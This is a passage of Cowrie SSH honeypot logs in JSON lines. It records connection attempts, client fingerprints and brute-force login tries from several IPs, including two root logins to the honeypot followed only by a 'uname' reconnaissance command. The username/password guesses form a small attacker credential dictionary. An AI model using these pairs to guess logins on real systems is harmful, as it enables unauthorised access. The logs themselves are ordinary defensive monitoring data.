0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:11:39.094592Z","src_ip":"212.227.125.160","session":"de4ed3c8f474"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:39.988200Z","src_ip":"212.227.125.160","session":"de4ed3c8f474"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":23987,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0611b2f4340","protocol":"ssh","message":"New connection: 80.94.95.112:23987 (1.2.3.4:22) [session: b0611b2f4340]","sensor":"my-vps","timestamp":"2025-08-28T07:11:40.072741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:11:40.073707Z","src_ip":"80.94.95.112","session":"b0611b2f4340"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:11:40.104075Z","src_ip":"80.94.95.112","session":"b0611b2f4340"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beaks","message":"login attempt [admin/beaks] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:40.313150Z","src_ip":"80.94.95.112","session":"b0611b2f4340"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:41.213428Z","src_ip":"212.227.125.160","session":"de4ed3c8f474"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bdfyjdf","message":"login attempt [admin/bdfyjdf] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:41.344925Z","src_ip":"80.94.95.112","session":"b0611b2f4340"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bassbass","message":"login attempt [admin/bassbass] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:42.378379Z","src_ip":"80.94.95.112","session":"b0611b2f4340"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bartok","message":"login attempt [admin/bartok] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:43.411994Z","src_ip":"80.94.95.112","session":"b0611b2f4340"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bagels","message":"login attempt [admin/bagels] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:44.444364Z","src_ip":"80.94.95.112","session":"b0611b2f4340"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46482,"dst_ip":"1.2.3.4","dst_port":22,"session":"cec130ddd2f6","protocol":"ssh","message":"New connection: 212.227.235.229:46482 (1.2.3.4:22) [session: cec130ddd2f6]","sensor":"my-vps","timestamp":"2025-08-28T07:11:45.396191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:11:45.397165Z","src_ip":"212.227.235.229","session":"cec130ddd2f6"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:45.476503Z","src_ip":"80.94.95.112","session":"b0611b2f4340"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:11:45.647749Z","src_ip":"212.227.235.229","session":"cec130ddd2f6"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:46.401494Z","src_ip":"212.227.235.229","session":"cec130ddd2f6"}
{"eventid":"cowrie.session.closed","duration":33.23979163169861,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:46.914623Z","src_ip":"8.222.212.69","session":"600f27e375c0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:47.653641Z","src_ip":"212.227.235.229","session":"cec130ddd2f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54006,"dst_ip":"1.2.3.4","dst_port":22,"session":"98f9d9450ccf","protocol":"ssh","message":"New connection: 212.227.125.160:54006 (1.2.3.4:22) [session: 98f9d9450ccf]","sensor":"my-vps","timestamp":"2025-08-28T07:11:55.091190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:11:55.094523Z","src_ip":"212.227.125.160","session":"98f9d9450ccf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:11:55.308334Z","src_ip":"212.227.125.160","session":"98f9d9450ccf"}
{"eventid":"cowrie.session.closed","duration":31.53006911277771,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:56.088305Z","src_ip":"8.222.212.69","session":"f9eb33ca9d91"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-28T07:11:56.172263Z","src_ip":"212.227.125.160","session":"98f9d9450ccf"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:11:57.390011Z","src_ip":"212.227.125.160","session":"98f9d9450ccf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36766,"dst_ip":"1.2.3.4","dst_port":22,"session":"70f0411121cd","protocol":"ssh","message":"New connection: 212.227.235.229:36766 (1.2.3.4:22) [session: 70f0411121cd]","sensor":"my-vps","timestamp":"2025-08-28T07:12:01.795857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:12:01.796805Z","src_ip":"212.227.235.229","session":"70f0411121cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:12:02.041721Z","src_ip":"212.227.235.229","session":"70f0411121cd"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-28T07:12:03.022273Z","src_ip":"212.227.235.229","session":"70f0411121cd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:04.269713Z","src_ip":"212.227.235.229","session":"70f0411121cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36700,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8c5099a4129","protocol":"ssh","message":"New connection: 212.227.125.160:36700 (1.2.3.4:22) [session: e8c5099a4129]","sensor":"my-vps","timestamp":"2025-08-28T07:12:11.476964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:12:11.478240Z","src_ip":"212.227.125.160","session":"e8c5099a4129"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:12:11.697678Z","src_ip":"212.227.125.160","session":"e8c5099a4129"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-28T07:12:12.348366Z","src_ip":"212.227.125.160","session":"e8c5099a4129"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:13.566616Z","src_ip":"212.227.125.160","session":"e8c5099a4129"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47652,"dst_ip":"1.2.3.4","dst_port":22,"session":"46933cc8d053","protocol":"ssh","message":"New connection: 212.227.235.229:47652 (1.2.3.4:22) [session: 46933cc8d053]","sensor":"my-vps","timestamp":"2025-08-28T07:12:18.257458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:12:18.258287Z","src_ip":"212.227.235.229","session":"46933cc8d053"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:12:18.510483Z","src_ip":"212.227.235.229","session":"46933cc8d053"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-28T07:12:19.268481Z","src_ip":"212.227.235.229","session":"46933cc8d053"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:20.523113Z","src_ip":"212.227.235.229","session":"46933cc8d053"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58480,"dst_ip":"1.2.3.4","dst_port":22,"session":"79729560f01e","protocol":"ssh","message":"New connection: 212.227.125.160:58480 (1.2.3.4:22) [session: 79729560f01e]","sensor":"my-vps","timestamp":"2025-08-28T07:12:28.104381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:12:28.119610Z","src_ip":"212.227.125.160","session":"79729560f01e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:12:28.323859Z","src_ip":"212.227.125.160","session":"79729560f01e"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:12:29.198922Z","src_ip":"212.227.125.160","session":"79729560f01e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:12:29.655081Z","src_ip":"212.227.125.160","session":"79729560f01e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:12:29.655934Z","src_ip":"212.227.125.160","session":"79729560f01e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:29.876763Z","src_ip":"212.227.125.160","session":"79729560f01e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:29.877821Z","src_ip":"212.227.125.160","session":"79729560f01e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52838,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfc3dd94bc81","protocol":"ssh","message":"New connection: 212.227.235.229:52838 (1.2.3.4:22) [session: dfc3dd94bc81]","sensor":"my-vps","timestamp":"2025-08-28T07:12:34.846220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:12:34.847177Z","src_ip":"212.227.235.229","session":"dfc3dd94bc81"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:12:35.102146Z","src_ip":"212.227.235.229","session":"dfc3dd94bc81"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:12:35.870829Z","src_ip":"212.227.235.229","session":"dfc3dd94bc81"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:12:36.482054Z","src_ip":"212.227.235.229","session":"dfc3dd94bc81"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:12:36.482760Z","src_ip":"212.227.235.229","session":"dfc3dd94bc81"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:36.739623Z","src_ip":"212.227.235.229","session":"dfc3dd94bc81"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:12:36.740668Z","src_ip":"212.227.235.229","session":"dfc3dd94bc81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46488,"dst_ip":"1.2.3.4","dst_port":22,"session":"084640a7ffc1","protocol":"ssh","message":"New connection: 212.227.125.160:46488 (1.2.3.4:22) [session: 084640a7ffc1]","sensor":"my-vps","timestamp":"2025-08-28T07:12:44.813626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:12:44.818499Z","src_ip":"212.227.125.160","session":"084640a7ffc1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hm